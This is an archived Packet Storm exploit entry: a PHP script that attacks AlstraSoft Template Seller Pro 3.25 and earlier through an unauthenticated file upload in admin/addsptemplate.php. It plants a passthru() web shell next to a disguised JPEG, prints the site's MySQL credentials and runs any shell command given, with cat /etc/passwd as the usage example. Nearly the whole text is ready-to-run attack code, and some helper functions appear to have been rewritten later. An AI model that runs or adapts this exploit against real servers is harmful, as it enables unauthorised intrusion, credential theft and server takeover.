tsp-exec.txt

2007-05-21T00:00:00
ID PACKETSTORM:56841
Type packetstorm
Reporter BlackHawk
Modified 2007-05-21T00:00:00

Description

                                        
                                            `#!/usr/bin/php -q -d short_open_tag=on  
<?  
echo "  
AlstraSoft Template Seller Pro <= 3.25 Remote Code Execution Exploit  
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>  
Thanks to rgod for the php code and Marty for the Love  
  
";  
if ($argc<4) {  
echo "Usage: php ".$argv[0]." Host Path CMD  
Host: target server (ip/hostname)  
Path: path of template  
CMD: A Shell Command  
  
Example:  
php ".$argv[0]." localhost /template/ cat /etc/passwd";  
  
die;  
}  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",5);  
  
/*  
___________________________________________________________________  
/ This script is part of the AlstraSoft Exploit Pack: \  
| |  
| http://itablackhawk.altervista.org/exploit/alsoft_exploit_pack; |  
| |  
| You can find the patches for these bugs at: |
| |  
| http://itablackhawk.altervista.org/download/alsoft_patch.zip |  
| |  
\________________________.:BlackHawk 2007:._________________________/  
  
*/  
  
/*  
VULN EXPLANATION  
  
Same root cause as Vuln N.1, but this entry point also lets us upload PHP files:
the "zip" field of admin/addsptemplate.php is stored under sptemplates/<id>/ with
its original filename, and the request sent below carries no session cookie.

The vulnerable script is admin/addsptemplate.php.
  
  
*/  
  
/**
 * Render a byte string as a hex dump for debugging.
 *
 * Produces two listings, each byte preceded by a space and wrapped every
 * 15 bytes with CRLF: first the lowercase two-digit hex of every byte, then
 * (after a CRLF separator) the printable ASCII view, where control bytes,
 * space, DEL and anything above 0x7e are shown as ".".
 *
 * @param string $string raw bytes to dump
 * @return string hex listing, "\r\n", printable listing
 */
function quick_dump($string)
{
    $printable = '';
    $hex       = '';
    $column    = 0;
    $length    = strlen($string);

    for ($i = 0; $i < $length; $i++) {
        $byte = ord($string[$i]);
        // Only 0x21..0x7e is shown literally; everything else becomes a dot.
        $printable .= ($byte <= 32 || $byte > 126) ? ' .' : ' ' . $string[$i];
        $hex       .= sprintf(' %02x', $byte);
        if (++$column == 15) {
            $column     = 0;
            $printable .= "\r\n";
            $hex       .= "\r\n";
        }
    }

    return $hex . "\r\n" . $printable;
}
// PCRE pattern for the optional proxy setting ("ip:port"). The surrounding
// parentheses are the pattern delimiters, not a capture group. The pattern is
// only \b-bounded, not anchored, and does not validate octet/port ranges.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
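/**
 * Send one raw HTTP request and store the complete response in global $html.
 *
 * Connects directly to $host:$port, or to $proxy ("ip:port") when set, writes
 * $packet verbatim and reads until the peer closes the connection (every
 * request built in this script sends "Connection: Close") or the read times out.
 *
 * Fixes versus the original:
 *  - the proxy branch used eregi(), which no longer exists in PHP 7+, and looped
 *    while (!feof || headers-not-seen): a peer that closes without sending
 *    "\r\n\r\n" made fread() return "" forever, hanging the exploit;
 *  - fsockopen() failures now report the OS error string;
 *  - a read timeout is set so a silent server cannot block indefinitely.
 *
 * @param string $packet complete HTTP request bytes (headers and body)
 * @return void  result is left in global $html; exits on connection failure
 */
function sendpacketii($packet)
{
    global $proxy, $host, $port, $html, $proxy_regex;

    if ($proxy == '') {
        $ock = fsockopen(gethostbyname($host), $port, $errno, $errstr, 5);
        if (!$ock) {
            echo 'No response from ' . $host . ':' . $port . ' (' . $errstr . ')';
            die;
        }
    } else {
        if (!preg_match($proxy_regex, $proxy)) {
            echo 'Not a valid proxy...';
            die;
        }
        $parts = explode(':', $proxy);
        echo "Connecting to " . $parts[0] . ":" . $parts[1] . " proxy...\r\n";
        $ock = fsockopen($parts[0], $parts[1], $errno, $errstr, 5);
        if (!$ock) {
            echo 'No response from proxy... (' . $errstr . ')';
            die;
        }
    }

    // Bound each read so a peer that accepts the connection but never answers
    // cannot stall the script; the loop below exits on "" (timeout) or EOF.
    stream_set_timeout($ock, 10);
    fputs($ock, $packet);

    $html = '';
    while (!feof($ock)) {
        $chunk = fread($ock, 8192);
        if ($chunk === false || $chunk === '') {
            break;
        }
        $html .= $chunk;
    }
    fclose($ock);
}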
  
// Command-line arguments: target host, web path of the application, and the
// command to run (all remaining words, joined with a leading space as before).
$host = $argv[1];
$path = $argv[2];

$cmd = '';
foreach (array_slice($argv, 3) as $word) {
    $cmd .= ' ' . $word;
}

// Fixed in this release: plain HTTP on port 80, no proxy.
$port  = 80;
$proxy = '';

// The command travels in a query string, so it must be URL-encoded.
$cmd = urlencode($cmd);

// The path must be absolute and end with a slash so it can be prefixed to
// the script names below without further joining.
if (substr($path, 0, 1) != '/' || substr($path, -1) != '/') {
    echo 'Error... check the path!';
    exit;
}

// Through a proxy the request line needs an absolute URL; directly, the path alone.
$p = ($proxy == '') ? $path : 'http://' . $host . ':' . $port . $path;
echo "- Uploading Shell Creator..\r\n";  
$italy_rulez=  
chr(0xff).chr(0xd8).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).  
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).  
chr(0x00).chr(0x60).chr(0x00).chr(0x60).chr(0x00).chr(0x00).chr(0xff).  
chr(0xe1).chr(0x00).chr(0x36).chr(0x45).chr(0x78).chr(0x69).chr(0x66).  
chr(0x00).chr(0x00).chr(0x49).chr(0x49).chr(0x2a).chr(0x00).chr(0x08).  
chr(0x00).chr(0x00).chr(0x00).chr(0x02).chr(0x00).chr(0x01).chr(0x03).  
chr(0x05).chr(0x00).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x26).  
chr(0x00).chr(0x00).chr(0x00).chr(0x03).chr(0x03).chr(0x01).chr(0x00).  
chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x14).chr(0xc6).  
chr(0xff).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xa0).chr(0x86).  
chr(0x01).chr(0x00).chr(0x8f).chr(0xb1).chr(0x00).chr(0x00).chr(0xff).  
chr(0xdb).chr(0x00).chr(0x43).chr(0x00).chr(0x08).chr(0x06).chr(0x06).  
chr(0x07).chr(0x06).chr(0x05).chr(0x08).chr(0x07).chr(0x07).chr(0x07).  
chr(0x09).chr(0x09).chr(0x08).chr(0x0a).chr(0x0c).chr(0x14).chr(0x0d).  
chr(0x0c).chr(0x0b).chr(0x0b).chr(0x0c).chr(0x19).chr(0x12).chr(0x13).  
chr(0x0f).chr(0x14).chr(0x1d).chr(0x1a).chr(0x1f).chr(0x1e).chr(0x1d).  
chr(0x1a).chr(0x1c).chr(0x1c).chr(0x20).chr(0x24).chr(0x2e).chr(0x27).  
chr(0x20).chr(0x22).chr(0x2c).chr(0x23).chr(0x1c).chr(0x1c).chr(0x28).  
chr(0x37).chr(0x29).chr(0x2c).chr(0x30).chr(0x31).chr(0x34).chr(0x34).  
chr(0x34).chr(0x1f).chr(0x27).chr(0x39).chr(0x3d).chr(0x38).chr(0x32).  
chr(0x3c).chr(0x2e).chr(0x33).chr(0x34).chr(0x32).chr(0xff).chr(0xdb).  
chr(0x00).chr(0x43).chr(0x01).chr(0x09).chr(0x09).chr(0x09).chr(0x0c).  
chr(0x0b).chr(0x0c).chr(0x18).chr(0x0d).chr(0x0d).chr(0x18).chr(0x32).  
chr(0x21).chr(0x1c).chr(0x21).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).  
chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0xff).chr(0xc0).chr(0x00).  
chr(0x11).chr(0x08).chr(0x00).chr(0x14).chr(0x00).chr(0x1e).chr(0x03).  
chr(0x01).chr(0x22).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).  
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x00).  
chr(0x00).chr(0x01).chr(0x05).chr(0x01).chr(0x01).chr(0x01).chr(0x01).  
chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).  
chr(0x05).chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).  
chr(0xff).chr(0xc4).chr(0x00).chr(0xb5).chr(0x10).chr(0x00).chr(0x02).  
chr(0x01).chr(0x03).chr(0x03).chr(0x02).chr(0x04).chr(0x03).chr(0x05).  
chr(0x05).chr(0x04).chr(0x04).chr(0x00).chr(0x00).chr(0x01).chr(0x7d).  
chr(0x01).chr(0x02).chr(0x03).chr(0x00).chr(0x04).chr(0x11).chr(0x05).  
chr(0x12).chr(0x21).chr(0x31).chr(0x41).chr(0x06).chr(0x13).chr(0x51).  
chr(0x61).chr(0x07).chr(0x22).chr(0x71).chr(0x14).chr(0x32).chr(0x81).  
chr(0x91).chr(0xa1).chr(0x08).chr(0x23).chr(0x42).chr(0xb1).chr(0xc1).  
chr(0x15).chr(0x52).chr(0xd1).chr(0xf0).chr(0x24).chr(0x33).chr(0x62).  
chr(0x72).chr(0x82).chr(0x09).chr(0x0a).chr(0x16).chr(0x17).chr(0x18).  
chr(0x19).chr(0x1a).chr(0x25).chr(0x26).chr(0x27).chr(0x28).chr(0x29).  
chr(0x2a).chr(0x34).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).  
chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).  
chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).  
chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).  
chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).  
chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x83).chr(0x84).  
chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).chr(0x92).  
chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).chr(0x99).  
chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).chr(0xa7).  
chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).chr(0xb5).  
chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).chr(0xc3).  
chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).chr(0xca).  
chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).chr(0xd8).  
chr(0xd9).chr(0xda).chr(0xe1).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).  
chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf1).chr(0xf2).  
chr(0xf3).chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).  
chr(0xfa).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x01).chr(0x00).  
chr(0x03).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).  
chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).chr(0x05).  
chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).chr(0xff).  
chr(0xc4).chr(0x00).chr(0xb5).chr(0x11).chr(0x00).chr(0x02).chr(0x01).  
chr(0x02).chr(0x04).chr(0x04).chr(0x03).chr(0x04).chr(0x07).chr(0x05).  
chr(0x04).chr(0x04).chr(0x00).chr(0x01).chr(0x02).chr(0x77).chr(0x00).  
chr(0x01).chr(0x02).chr(0x03).chr(0x11).chr(0x04).chr(0x05).chr(0x21).  
chr(0x31).chr(0x06).chr(0x12).chr(0x41).chr(0x51).chr(0x07).chr(0x61).  
chr(0x71).chr(0x13).chr(0x22).chr(0x32).chr(0x81).chr(0x08).chr(0x14).  
chr(0x42).chr(0x91).chr(0xa1).chr(0xb1).chr(0xc1).chr(0x09).chr(0x23).  
chr(0x33).chr(0x52).chr(0xf0).chr(0x15).chr(0x62).chr(0x72).chr(0xd1).  
chr(0x0a).chr(0x16).chr(0x24).chr(0x34).chr(0xe1).chr(0x25).chr(0xf1).  
chr(0x17).chr(0x18).chr(0x19).chr(0x1a).chr(0x26).chr(0x27).chr(0x28).  
chr(0x29).chr(0x2a).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).  
chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48).  
chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57).  
chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66).  
chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75).  
chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x82).chr(0x83).  
chr(0x84).chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).  
chr(0x92).chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).  
chr(0x99).chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).  
chr(0xa7).chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).  
chr(0xb5).chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).  
chr(0xc3).chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).  
chr(0xca).chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).  
chr(0xd8).chr(0xd9).chr(0xda).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5).  
chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf2).chr(0xf3).  
chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).chr(0xfa).  
chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).chr(0x00).  
chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).  
chr(0xd6).chr(0xaf).chr(0x4f).chr(0xf0).chr(0x97).chr(0xfc).chr(0x8b).  
chr(0x16).chr(0x7f).chr(0xf0).chr(0x3f).chr(0xfd).chr(0x0d).chr(0xab).  
chr(0xcc).chr(0x2b).chr(0xd3).chr(0xfc).chr(0x25).chr(0xff).chr(0x00).  
chr(0x22).chr(0xc5).chr(0x9f).chr(0xfc).chr(0x0f).chr(0xff).chr(0x00).  
chr(0x43).chr(0x6a).chr(0xf9).chr(0x0c).chr(0x83).chr(0xfd).chr(0xe6).  
chr(0x5f).chr(0xe1).chr(0x7f).chr(0x9a).chr(0x3e).chr(0x13).chr(0x85).  
chr(0xff).chr(0x00).chr(0xdf).chr(0x25).chr(0xfe).chr(0x17).chr(0xf9).  
chr(0xa3).chr(0x80).chr(0xf8).chr(0xd9).chr(0xff).chr(0x00).chr(0x30).  
chr(0x3f).chr(0xfb).chr(0x78).chr(0xff).chr(0x00).chr(0xda).chr(0x75).  
chr(0xe4).chr(0xb5).chr(0xeb).chr(0x5f).chr(0x1b).chr(0x3f).chr(0xe6).  
chr(0x07).chr(0xff).chr(0x00).chr(0x6f).chr(0x1f).chr(0xfb).chr(0x4e).  
chr(0xbc).chr(0x96).chr(0xbd).chr(0x2c).chr(0x67).chr(0xf1).chr(0xe5).  
chr(0xf2).chr(0xfc).chr(0x8f).chr(0xe9).chr(0x0e).chr(0x1b).chr(0xff).  
chr(0x00).chr(0x91).chr(0x5d).chr(0x2f).chr(0xfb).chr(0x7b).chr(0xff).  
chr(0x00).chr(0x4a).chr(0x67).chr(0xa5).chr(0x57).chr(0xa7).chr(0xf8).  
chr(0x4b).chr(0xfe).chr(0x45).chr(0x8b).chr(0x3f).chr(0xf8).chr(0x1f).  
chr(0xfe).chr(0x86).chr(0xd4).chr(0x51).chr(0x5e).chr(0x6e).chr(0x41).  
chr(0xfe).chr(0xf3).chr(0x2f).chr(0xf0).chr(0xbf).chr(0xcd).chr(0x1f).  
chr(0xcd).chr(0xfc).chr(0x2f).chr(0xfe).chr(0xf9).chr(0x2f).chr(0xf0).  
chr(0xbf).chr(0xcd).chr(0x1c).chr(0x07).chr(0xc6).chr(0xcf).chr(0xf9).  
chr(0x81).chr(0xff).chr(0x00).chr(0xdb).chr(0xc7).chr(0xfe).chr(0xd3).  
chr(0xaf).chr(0x25).chr(0xa2).chr(0x8a).chr(0xf4).chr(0xb1).chr(0x9f).  
chr(0xc7).chr(0x97).chr(0xcb).chr(0xf2).chr(0x3f).chr(0xa4).chr(0x38).  
chr(0x6f).chr(0xfe).chr(0x45).chr(0x74).chr(0xbf).chr(0xed).chr(0xef).  
chr(0xfd).chr(0x29).chr(0x9f).chr(0xff).chr(0xd9);  
$data="-----------------------------7d529a1d23092a\r\n";  
$data.="Content-Disposition: form-data; name=\"zip\"; filename=\"piggy_marty_creator.php\"\r\n";  
$data.="Content-Type:\r\n\r\n";  
$data.="<?php  
\$fp=fopen('piggy_marty.php','w');  
fputs(\$fp,'<?php error_reporting(0);  
set_time_limit(0);  
if (get_magic_quotes_gpc()) {  
\$_GET[cmd]=stripslashes(\$_GET[cmd]);  
}  
echo 666999;  
passthru(\$_GET[cmd]);  
echo 666999;  
?>');  
fclose(\$fp);  
chmod('piggy_marty.php',777);  
include '../../include/common.php';  
echo 'delimitator'.\$db_server.'|'.\$db_user.'|'.\$db_password.'|'.\$db_database;  
?>\r\n";  
$data.='-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="addsubmit"  
  
1  
-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="type"  
  
2  
-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="category"  
  
Exploit And Similar  
-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="sdes"  
  
4  
-----------------------------7d529a1d23092a  
Content-Disposition: form-data; name="fpi"; filename="daforno_imperat.jpeg";  
Content-Type: image/pjpeg  
  
'.$italy_rulez.'  
-----------------------------7d529a1d23092a--  
';  
$packet="POST ".$p."admin/addsptemplate.php HTTP/1.0\r\n";  
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof  
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";  
$packet.="Referer: http://".$host.$path."/example.html\r\n";  
$packet.="Accept-Language: it\r\n";  
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";  
$packet.="Accept-Encoding: gzip, deflate\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Connection: Close\r\n";  
$packet.="Cache-Control: no-cache\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
  
echo "- Retrieving correct Path where the shell is located..\r\n";  
  
$packet ="GET ".$p."spusers/browse.php?browse=yes&show=all HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
if (preg_match("#/sptemplates/(.*?)/thumb_daforno_imperat.jpeg#is", $html, $oki))  
{  
echo "- Creating the Shell & getting server credentials..\r\n";  
$packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty_creator.php HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
  
sleep(3);  
$temp=explode('delimitator',$html);  
list($myserver,$myusername,$mypassword,$mydbname)=explode('|',$temp[1]);  
echo "  
  
--- INFO FROM COMMON.PHP ---  
  
MySQL Server: $myserver  
MySQL Username: $myusername  
MySQL Password: $mypassword  
MySQL Database: $mydbname  
  
--- END INFO ---  
  
";  
echo "Step 5 - Execute Commands exist..\r\n";  
$packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
$packet.=$data;  
sendpacketii($packet);  
if (strstr($html,"666999"))  
{  
echo "Exploit succeeded...\r\n";  
$temp=explode("666999",$html);  
die("\r\n".$temp[1]."\r\n");  
}  
  
}  
else  
{  
die ('Error: Can\'t retrieve Shell Path');  
}  
  
# Coded With BH Fast Generator v0.1  
?>  
  
`